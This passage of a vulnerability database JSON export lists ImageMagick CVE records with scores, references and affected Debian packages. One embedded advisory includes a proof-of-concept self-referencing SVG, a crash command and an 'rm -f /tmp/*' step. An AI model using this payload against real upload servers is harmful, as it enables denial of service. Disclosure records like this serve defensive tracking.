"https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*", "reference_id": "cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "reference_id": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2019-16710", "reference_id": "CVE-2019-16710", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv2", "scoring_elements": "AV:N/AC:M/Au:N/C:N/I:N/A:P" }, { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-16710" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2020:1180", "reference_id": "RHSA-2020:1180", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2020:1180" }, { "reference_url": "https://usn.ubuntu.com/4192-1/", "reference_id": "USN-4192-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/4192-1/" }, { "reference_url": "https://usn.ubuntu.com/7053-1/", "reference_id": "USN-7053-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/7053-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1037804?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.10.23%2Bdfsg-2.1%2Bdeb10u1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-12rd-dhh3-h3ea" }, { "vulnerability": "VCID-152y-9pjj-p7b7" }, { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-18rv-b2mg-jbex" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2dgn-j4dn-9fcd" }, { "vulnerability": "VCID-2dwv-ndt5-gfg2" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2m38-vt4m-5ffa" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-3bbh-2exn-m7ac" }, { "vulnerability": "VCID-3qad-mewf-8khz" }, { "vulnerability": "VCID-3zbe-p6ue-ffe8" }, { "vulnerability": "VCID-41xr-8ryd-z3ew" }, { "vulnerability": "VCID-453d-2nac-jbdc" }, { "vulnerability": "VCID-46ey-s7sy-9qby" }, { "vulnerability": "VCID-4az8-8361-7bg2" }, { "vulnerability": "VCID-4f97-2smu-6qfc" }, { "vulnerability": "VCID-4s25-p8ea-zkh7" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-56xz-svu7-eue2" }, { "vulnerability": "VCID-5a4x-wwha-pufn" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-6279-tc7g-g3ag" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-68kj-s42g-effd" }, { "vulnerability": "VCID-6bf2-uh5z-kfg7" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6vvv-g1fm-4bdn" }, { "vulnerability": "VCID-6y99-sgwe-tygw" }, { "vulnerability": "VCID-6zuv-uh18-k3c1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gya-qyjx-qqfx" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-7yur-twpa-n3e1" }, { "vulnerability": "VCID-834e-c7gn-afac" }, { "vulnerability": "VCID-8yfc-gunh-17a2" }, { "vulnerability": "VCID-92es-dtbz-tqae" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-9h1k-h8gw-hkat" }, { "vulnerability": "VCID-acgu-hc83-yubn" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-aej5-sgf8-7uhp" }, { "vulnerability": "VCID-agz5-g8mr-e7hn" }, { "vulnerability": "VCID-anh4-1hmn-yfh8" }, { "vulnerability": "VCID-aqs4-r36j-ffe7" }, { "vulnerability": "VCID-ay8n-59tt-k7cp" }, { "vulnerability": "VCID-b32k-mwuv-hfeq" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-b8hx-6u4j-b3dc" }, { "vulnerability": "VCID-bcy4-phg3-w3fq" }, { "vulnerability": "VCID-bky2-hjpj-67ag" }, { "vulnerability": "VCID-c8rr-y6zy-h7h5" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-ccbh-689z-6kg2" }, { "vulnerability": "VCID-cmym-m1da-f3fg" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-cure-qgzj-8qfu" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-djqz-f6k5-fqfj" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-ezcj-2yaf-rfhh" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-fzhr-jhhc-m3ej" }, { "vulnerability": "VCID-g1ct-6d28-g3ab" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gc9p-4vdm-rbah" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-gf8v-mmd7-hqag" }, { "vulnerability": "VCID-gp36-v664-vuh2" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-h7em-v8x6-63e3" }, { "vulnerability": "VCID-hrrw-ufje-akg5" }, { "vulnerability": "VCID-hwcd-dj3f-guay" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jpxf-qevp-kycp" }, { "vulnerability": "VCID-jqv2-v42r-7ybf" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-kfb4-xnqr-cya6" }, { "vulnerability": "VCID-mhbe-8x14-f3d6" }, { "vulnerability": "VCID-mmw7-4m3z-2kcn" }, { "vulnerability": "VCID-mn5y-2hmf-dkgy" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-my2x-tnvf-wqbw" }, { "vulnerability": "VCID-n22y-f9az-fubm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-neaa-39c7-sfbc" }, { "vulnerability": "VCID-nvea-drm5-h3au" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-nxfx-jh82-vud3" }, { "vulnerability": "VCID-p3vh-b6jn-f3e2" }, { "vulnerability": "VCID-p4yb-mqca-v7c8" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-p6m5-ntbm-auct" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-pj8s-qad1-6qdu" }, { "vulnerability": "VCID-pjm4-2g47-4qau" }, { "vulnerability": "VCID-pk4j-w1q9-vqd2" }, { "vulnerability": "VCID-pmpn-drv8-9ude" }, { "vulnerability": "VCID-psf6-cvdn-h3b1" }, { "vulnerability": "VCID-ptej-pfyn-z3aq" }, { "vulnerability": "VCID-q3v4-jztv-9bbs" }, { "vulnerability": "VCID-qda9-n7gh-c7c4" }, { "vulnerability": "VCID-qrqm-h5se-1kep" }, { "vulnerability": "VCID-r1uc-e1w7-kyda" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-rqdx-1pdv-a3bu" }, { "vulnerability": "VCID-rqm7-d751-myfa" }, { "vulnerability": "VCID-rrvd-vd81-sfdm" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-rvjq-uks4-x3h3" }, { "vulnerability": "VCID-rzge-64xp-bfej" }, { "vulnerability": "VCID-s7tx-uu27-xqb5" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-snup-2hn7-sue2" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-swqu-wape-83bj" }, { "vulnerability": "VCID-sy2v-5ufy-sfc4" }, { "vulnerability": "VCID-t2pe-etah-1bh3" }, { "vulnerability": "VCID-tc3z-912z-afc8" }, { "vulnerability": "VCID-tm56-q7ka-ukft" }, { "vulnerability": "VCID-tn11-bwg6-m3e3" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-twq8-ntkg-zbfk" }, { "vulnerability": "VCID-u6vb-tewy-fkda" }, { "vulnerability": "VCID-u9gb-ppd4-3fd5" }, { "vulnerability": "VCID-ucfp-qqy4-jqdm" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-uwq6-h2du-dkdn" }, { "vulnerability": "VCID-v2r8-1wgn-1bgs" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vf3u-cgrx-a7d7" }, { "vulnerability": "VCID-vgvf-at1z-8ydr" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-vrqg-4fke-mfay" }, { "vulnerability": "VCID-wpsv-h9q7-pyep" }, { "vulnerability": "VCID-wwcs-2mw8-4bbr" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-x95w-ad3j-n7aj" }, { "vulnerability": "VCID-x998-fhs5-93ht" }, { "vulnerability": "VCID-xnkt-e7mn-e7du" }, { "vulnerability": "VCID-xsue-s6sg-aqff" }, { "vulnerability": "VCID-xtfv-8vvu-qudb" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yhmq-s1jh-17bh" }, { "vulnerability": "VCID-yspe-wj34-juck" }, { "vulnerability": "VCID-ytpg-f9mm-sbev" }, { "vulnerability": "VCID-yub2-x8z7-d3e6" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zdu5-rtg2-pffb" }, { "vulnerability": "VCID-zh44-pz7k-abba" }, { "vulnerability": "VCID-zp6q-98qj-ykh1" }, { "vulnerability": "VCID-zv8w-puzj-23cd" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.10.23%252Bdfsg-2.1%252Bdeb10u1" }, { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2019-16710" ], "risk_score": 3.0, "exploitability": "0.5", "weighted_severity": "5.9", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-68kj-s42g-effd" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/82002?format=api", "vulnerability_id": "VCID-6bf2-uh5z-kfg7", "summary": "ImageMagick: outside the range of representable values of type 'unsigned long' at coders/palm.c", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-27761.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-27761.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2020-27761", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00127", "scoring_system": "epss", "scoring_elements": "0.31996", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.00127", "scoring_system": "epss", "scoring_elements": "0.32124", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00127", "scoring_system": "epss", "scoring_elements": "0.32163", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00127", "scoring_system": "epss", "scoring_elements": "0.31986", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00127", "scoring_system": "epss", "scoring_elements": "0.32037", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00127", "scoring_system": "epss", "scoring_elements": "0.32066", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00127", "scoring_system": "epss", "scoring_elements": "0.3207", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00127", "scoring_system": "epss", "scoring_elements": "0.32031", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00127", "scoring_system": "epss", "scoring_elements": "0.31999", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00127", "scoring_system": "epss", "scoring_elements": "0.32032", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00127", "scoring_system": "epss", "scoring_elements": "0.3201", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00127", "scoring_system": "epss", "scoring_elements": "0.31984", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00127", "scoring_system": "epss", "scoring_elements": "0.31817", "published_at": "2026-04-24T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2020-27761" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27761", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27761" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1894679", "reference_id": "1894679", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1894679" }, { "reference_url": "https://usn.ubuntu.com/4988-1/", "reference_id": "USN-4988-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/4988-1/" }, { "reference_url": "https://usn.ubuntu.com/7068-1/", "reference_id": "USN-7068-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/7068-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2020-27761" ], "risk_score": 1.5, "exploitability": "0.5", "weighted_severity": "3.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-6bf2-uh5z-kfg7" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/22874?format=api", "vulnerability_id": "VCID-6vvv-g1fm-4bdn", "summary": "ImageMagick: Specially crafted SVG leads to segmentation fault and generate trash files in \"/tmp\", possible to leverage DoS\n### Summary\nSpecially crafted SVG file make segmentation fault and generate trash files in \"/tmp\", possible to leverage DoS.\n\n### Operating system, version and so on\n\nLinux, Debian (Buster) LTS core 5.10 / Parrot OS 5.1 (Electro Ara)\n\n### Tested ImageMagick version\n\n6.9.11-60, 7.1.0-62\n\n### Details\nA specially created SVG file that loads by itself and make segmentation fault. Remote attackers can take advantage of this vulnerability to cause a denial of service of the generated SVG file.\n\nIt seems that this error affects a lot of websites and causes a generating trash files in ```/tmp``` when uploading this PC file to the server.\n\nI think it's better to check the file descriptor coming from itself before executing ```read()```.\n\n### PoC\n1. Generate SVG file:\n```<?xml version=\"1.0\" standalone=\"yes\"?>\n<!DOCTYPE test>\n<svg width=\"128px\" height=\"128px\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" version=\"1.1\">\n<image height=\"200\" width=\"200\" xlink:href=\"bad.svg\" />\n</svg>\n```\n2. Run some commands for verification:\n```$rm -f /tmp/*\n$./magick --version\nVersion: ImageMagick 7.1.0-62 Q16-HDRI x86_64 74b3683a4:20230211 https://imagemagick.org\nCopyright: (C) 1999 ImageMagick Studio LLC\nLicense: https://imagemagick.org/script/license.php\nFeatures: Cipher DPC HDRI OpenMP(4.5) \nDelegates (built-in): bzlib djvu fontconfig freetype jbig jng jpeg lcms lqr lzma openexr png raqm tiff webp x xml zlib\nCompiler: gcc (7.5)\n$./magick convert -verbose -font OpenSymbol bad.svg t.jpg\n'inkscape' '/tmp/magick-ixX13JwrwrLUhyucKsGxechsQtEN4Zji' --export-filename='/tmp/magick-qp154V6U-dyAwtU-QbcnWD8XKFcG7q5k.png' --export-dpi='96' --export-background='rgb(100%,100%,100%)' --export-background-opacity='1' > '/tmp/magick-YWdlPJt-_9BfRq0uY2vmza_VOxWfjyvl' 2>&1\nSegmentation fault\n$ls /tmp\nmagick-1iZstE-dzlzQTN4HkWX_JlakXXtH4IEM magick-GeFwj8Be_wISDLJnsr4s5WC7p079pzXN magick-s7QN2tTaiXEr9KmkbkHdmtfmgrnjFRaM\nmagick-1LG0ND-RZMQOG8xizDHd-qdd6_Fu70YP magick-ggORXwnSivWesH2gthhafuLTVw7TLqwP magick-s835rBXZIGK5bkp3ijKoMTCbcyWza3ON\nmagick-25byX_oEeEr2dWIkr9nyEoVz1MHC2n9M magick-GrRg60fY1LOv4uUhqD16AaEcL6rWtNeN magick-siS7QS_av31X63ENYmecytIjx1iKmWAN\nmagick-2Dj7LuLUHF6Y93mZ9ZT8a5taf7b5Hb9O magick-gTQUBafZIaI1n8q-QXOwOvyc6qv3tolN magick-SIXvVjWVvDhX1w5NL9K6owJtO0CgG3NN\nmagick-2GrJuPlQjwGwsTK8I1aTMxg90h8PeK4M magick-hik3AU_2x0D_R8ViIBXUIuRljCXSmgqO magick-sJhO2Yv_aeKsxt1JxDENKIiQqkOkSfwM\nmagick-2QIFnR9e-fYRFevd1-vQ-bSk0I1VOAsO magick-HJ18uyG3HLvEftNcMqCEJ5LKwi12CQgO magick-SNgGdhyKjp5TZZQmWqioLEcyQ8vMzG3O\nmagick-2rEueYW0PIXGxE1zHm3LsGedMW2KLdgP magick-hUaNDJgYfzTzJes4QlnLwaYh2fcaOWgQ magick-SxLBCSdKVHSQOrjohe4WFyLHaPOyDUiP\nmagick-2uRqbAjqkXXMMGQHpw8WG18lnDHaRd3N magick-_HWqrSdj_ihWMzjJ_eRiAkKbgrIljhUM magick-t02HQvZSsYLzmJesC2Mpjp5OL3zN4A5P\nmagick-3dPT4h0HzM6ZqCwpGEB69e27pZhHbfHP magick-iEMFbMc2VvGj067miVskUC-mxOveGpqO magick-T4kTJGu-6wF60OOIHOB5tKO63NW5qTTL\nmagick-3SVSiI4Yg_eQ01ZZV8lZsBM_MhauuwpO 